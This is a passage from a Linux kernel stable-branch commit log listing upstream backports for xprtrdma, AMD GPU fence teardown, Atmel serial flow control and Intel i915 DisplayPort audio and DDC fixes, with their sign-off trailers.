Reported-by: Vasco Steinmetz <linux@kyberraum.net>
Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Tested-by: Vasco Steinmetz <linux@kyberraum.net>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoxprtrdma: use complete() instead complete_all()
Daniel Wagner [Fri, 23 Sep 2016 08:41:57 +0000 (10:41 +0200)]
xprtrdma: use complete() instead complete_all()

commit 5690a22d8612e1788b48b4ea53c59868589cd2db upstream.

There is only one waiter for the completion, therefore there
is no need to use complete_all(). Let's make that clear by
using complete() instead of complete_all().

The usage pattern of the completion is:

waiter context                          waker context

frwr_op_unmap_sync()
  reinit_completion()
  ib_post_send()
  wait_for_completion()

frwr_wc_localinv_wake()
  complete()

Signed-off-by: Daniel Wagner <daniel.wagner@bmw-carit.de>
Cc: Anna Schumaker <Anna.Schumaker@Netapp.com>
Cc: Trond Myklebust <trond.myklebust@primarydata.com>
Cc: Chuck Lever <chuck.lever@oracle.com>
Cc: linux-nfs@vger.kernel.org
Cc: netdev@vger.kernel.org
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agodrm/amd: fix scheduler fence teardown order v2
Christian König [Fri, 28 Oct 2016 15:04:07 +0000 (17:04 +0200)]
drm/amd: fix scheduler fence teardown order v2

commit c24784f01549ecdf23fc00d0588423bcf8956714 upstream.

Some fences might be alive even after we have stopped the scheduler leading
to warnings about leaked objects from the SLUB allocator.

Fix this by allocating/freeing the SLUB allocator from the module
init/fini functions just like we do it for hw fences.

v2: make variable static, add link to bug

Fixes: https://bugs.freedesktop.org/show_bug.cgi?id=97500
Reported-by: Grazvydas Ignotas <notasas@gmail.com>
Signed-off-by: Christian König <christian.koenig@amd.com>
Reviewed-by: Alex Deucher <alexander.deucher@amd.com> (v1)
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agodrm/amdgpu: fix sched fence slab teardown
Grazvydas Ignotas [Sun, 23 Oct 2016 18:31:44 +0000 (21:31 +0300)]
drm/amdgpu: fix sched fence slab teardown

commit a053fb7e512c77f0742bceb578b10025256e1911 upstream.

To free fences, call_rcu() is used, which calls amd_sched_fence_free()
after a grace period. During teardown, there is no guarantee all
callbacks have finished, so sched_fence_slab may be destroyed before
all fences have been freed. If we are lucky, this results in some slab
warnings, if not, we get a crash in one of rcu threads because callback
is called after amdgpu has already been unloaded.

Fix it with a rcu_barrier().

Fixes: 189e0fb76304 ("drm/amdgpu: RCU protected amd_sched_fence_release")
Acked-by: Chunming Zhou <david1.zhou@amd.com>
Reviewed-by: Christian König <christian.koenig@amd.com>
Signed-off-by: Grazvydas Ignotas <notasas@gmail.com>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agotty/serial: at91: fix hardware handshake on Atmel platforms
Richard Genoud [Thu, 27 Oct 2016 16:04:06 +0000 (18:04 +0200)]
tty/serial: at91: fix hardware handshake on Atmel platforms

commit 9bcffe7575b721d7b6d9b3090fe18809d9806e78 upstream.

After commit 1cf6e8fc8341 ("tty/serial: at91: fix RTS line management
when hardware handshake is enabled"), the hardware handshake wasn't
functional anymore on Atmel platforms (beside SAMA5D2).

To understand why, one has to understand the flag ATMEL_US_USMODE_HWHS
first:
Before commit 1cf6e8fc8341 ("tty/serial: at91: fix RTS line management
when hardware handshake is enabled"), this flag was never set.
Thus, the CTS/RTS where only handled by serial_core (and everything
worked just fine).

This commit introduced the use of the ATMEL_US_USMODE_HWHS flag,
enabling it for all boards when the user space enables flow control.

When the ATMEL_US_USMODE_HWHS is set, the Atmel USART controller
handles a part of the flow control job:
- disable the transmitter when the CTS pin gets high.
- drive the RTS pin high when the DMA buffer transfer is completed or
  PDC RX buffer full or RX FIFO is beyond threshold. (depending on the
  controller version).

NB: This feature is *not* mandatory for the flow control to work.
(Nevertheless, it's very useful if low latencies are needed.)

Now, the specifics of the ATMEL_US_USMODE_HWHS flag:

- For platforms with DMAC and no FIFOs (sam9x25, sam9x35, sama5D3,
sama5D4, sam9g15, sam9g25, sam9g35)* this feature simply doesn't work.
( source: https://lkml.org/lkml/2016/9/7/598 )
Tested it on sam9g35, the RTS pins always stays up, even when RXEN=1
or a new DMA transfer descriptor is set.
=> ATMEL_US_USMODE_HWHS must not be used for those platforms

- For platforms with a PDC (sam926{0,1,3}, sam9g10, sam9g20, sam9g45,
sam9g46)*, there's another kind of problem. Once the flag
ATMEL_US_USMODE_HWHS is set, the RTS pin can't be driven anymore via
RTSEN/RTSDIS in USART Control Register. The RTS pin can only be driven
by enabling/disabling the receiver or setting RCR=RNCR=0 in the PDC
(Receive (Next) Counter Register).
=> Doing this is beyond the scope of this patch and could add other
bugs, so the original (and working) behaviour should be set for those
platforms (meaning ATMEL_US_USMODE_HWHS flag should be unset).

- For platforms with a FIFO (sama5d2)*, the RTS pin is driven according
to the RX FIFO thresholds, and can be also driven by RTSEN/RTSDIS in
USART Control Register. No problem here.
(This was the use case of commit 1cf6e8fc8341 ("tty/serial: at91: fix
RTS line management when hardware handshake is enabled"))
NB: If the CTS pin declared as a GPIO in the DTS, (for instance
cts-gpios = <&pioA PIN_PB31 GPIO_ACTIVE_LOW>), the transmitter will be
disabled.
=> ATMEL_US_USMODE_HWHS flag can be set for this platform ONLY IF the
CTS pin is not a GPIO.

So, the only case when ATMEL_US_USMODE_HWHS can be enabled is when
(atmel_use_fifo(port) &&
 !mctrl_gpio_to_gpiod(atmel_port->gpios, UART_GPIO_CTS))

Tested on all Atmel USART controller flavours:
AT91SAM9G35-CM (DMAC flavour), AT91SAM9G20-EK (PDC flavour),
SAMA5D2xplained (FIFO flavour).

* the list may not be exhaustive

Fixes: 1cf6e8fc8341 ("tty/serial: at91: fix RTS line management when hardware handshake is enabled")
Signed-off-by: Richard Genoud <richard.genoud@gmail.com>
Acked-by: Alexandre Belloni <alexandre.belloni@free-electrons.com>
Acked-by: Cyrille Pitchen <cyrille.pitchen@atmel.com>
Acked-by: Uwe Kleine-König <u.kleine-koenig@pengutronix.de>
[nicolas.ferre@atmel.com: adapt to 4.4.x kernel for stable by adding
the atmel_port variable declaration which was missing]
Signed-off-by: Nicolas Ferre <nicolas.ferre@atmel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agodrm/amdgpu: fix crash in acp_hw_fini
Alex Deucher [Thu, 3 Nov 2016 21:47:51 +0000 (17:47 -0400)]
drm/amdgpu: fix crash in acp_hw_fini

commit 757124d95c42bb579d67df51e51789849929ee31 upstream.

On CZ/ST systems with AZ rather than ACP audio, we need to bail
early in hw_fini since there is nothing to do.

bug: https://bugs.freedesktop.org/show_bug.cgi?id=98276

Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agodrm/amdgpu: disable runtime pm in certain cases
Alex Deucher [Mon, 31 Oct 2016 15:02:31 +0000 (11:02 -0400)]
drm/amdgpu: disable runtime pm in certain cases

commit 84b1528e8cef55274f0df20e93513b3060ce495a upstream.

If the platform does not support hybrid graphics or ATPX dGPU
power control.

Acked-by: Christian König <christian.koenig@amd.com>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agodrm/i915/dp: Extend BDW DP audio workaround to GEN9 platforms
Dhinakaran Pandiyan [Wed, 2 Nov 2016 20:13:21 +0000 (13:13 -0700)]
drm/i915/dp: Extend BDW DP audio workaround to GEN9 platforms

commit 61e0c5438866d0e737937fc35d752538960e1e9f upstream.

According to BSpec, cdclk for BDW has to be not less than 432 MHz with DP
audio enabled, port width x4, and link rate HBR2 (5.4 GHz). With cdclk less
than 432 MHz, enabling audio leads to pipe FIFO underruns and displays
cycling on/off.

Let's apply this work around to GEN9 platforms too, as it fixes the same
issue.

v2: Move drm_device to drm_i915_private conversion

Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=97907
Cc: Libin Yang <libin.yang@linux.intel.com>
Signed-off-by: Dhinakaran Pandiyan <dhinakaran.pandiyan@intel.com>
Reviewed-by: Jani Nikula <jani.nikula@intel.com>
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1478117601-19122-1-git-send-email-dhinakaran.pandiyan@intel.com
(cherry picked from commit 9c7540241885838cfc7fa58c4a8bd75be0303ed1)
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agodrm/i915/dp: BDW cdclk fix for DP audio
Dhinakaran Pandiyan [Tue, 1 Nov 2016 18:47:59 +0000 (11:47 -0700)]
drm/i915/dp: BDW cdclk fix for DP audio

commit fbb21c5202ae7f1e71e832b1af59fb047da6383e upstream.

According to BSpec, cdclk for BDW has to be not less than 432 MHz with DP
audio enabled, port width x4, and link rate HBR2 (5.4 GHz). With cdclk less
than 432 MHz, enabling audio leads to pipe FIFO underruns and displays
cycling on/off.

From BSpec:
"Display» BDW-SKL» dpr» [Register] DP_TP_CTL [BDW+,EXCLUDE(CHV)]
Workaround : Do not use DisplayPort with CDCLK less than 432 MHz, audio
enabled, port width x4, and link rate HBR2 (5.4 GHz), or else there may
be audio corruption or screen corruption."

Since, some DP configurations (e.g., MST) use port width x4 and HBR2
link rate, let's increase the cdclk to >= 432 MHz to enable audio for those
cases.

v4: Changed commit message
v3: Combine BDW pixel rate adjustments into a function (Jani)
v2: Restrict fix to BDW
    Retain the set cdclk across modesets (Ville)
Signed-off-by: Dhinakaran Pandiyan <dhinakaran.pandiyan@intel.com>
Reviewed-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Reviewed-by: Jani Nikula <jani.nikula@intel.com>
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1478026080-2925-1-git-send-email-dhinakaran.pandiyan@intel.com
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
(cherry picked from commit b30ce9e0552aa017ac6f2243f3c2d8e36fe52e69)
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
7 years agodrm/i915: Respect alternate_ddc_pin for all DDI ports
Ville Syrjälä [Tue, 11 Oct 2016 17:52:46 +0000 (20:52 +0300)]
drm/i915: Respect alternate_ddc_pin for all DDI ports

commit 8d83bc22b259e5526625b6d298f637786c71129f upstream.

The VBT provides the platform a way to mix and match the DDI ports vs.
GMBUS pins. Currently we only trust the VBT for DDI E, which I suppose
has no standard GMBUS pin assignment. However, there are machines out
there that use a non-standard mapping for the other ports as well.
Let's start trusting the VBT on this one for all ports on DDI platforms.

I've structured the code such that other platforms could easily start
using this as well, by simply filling in the ddi_port_info. IIRC there
may be CHV system that might actually need this.

v2: Include a commit message, include a debug message during init

Cc: Maarten Maathuis <madman2003@gmail.com>
Tested-by: Maarten Maathuis <madman2003@gmail.com>
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=97877
Signed-off-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1476208368-5710-3-git-send-email-ville.syrjala@linux.intel.com
Reviewed-by: Jim Bride <jim.bride@linux.intel.com>
(cherry picked from commit e4ab73a13291fc844c9e24d5c347bd95818544d2)
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>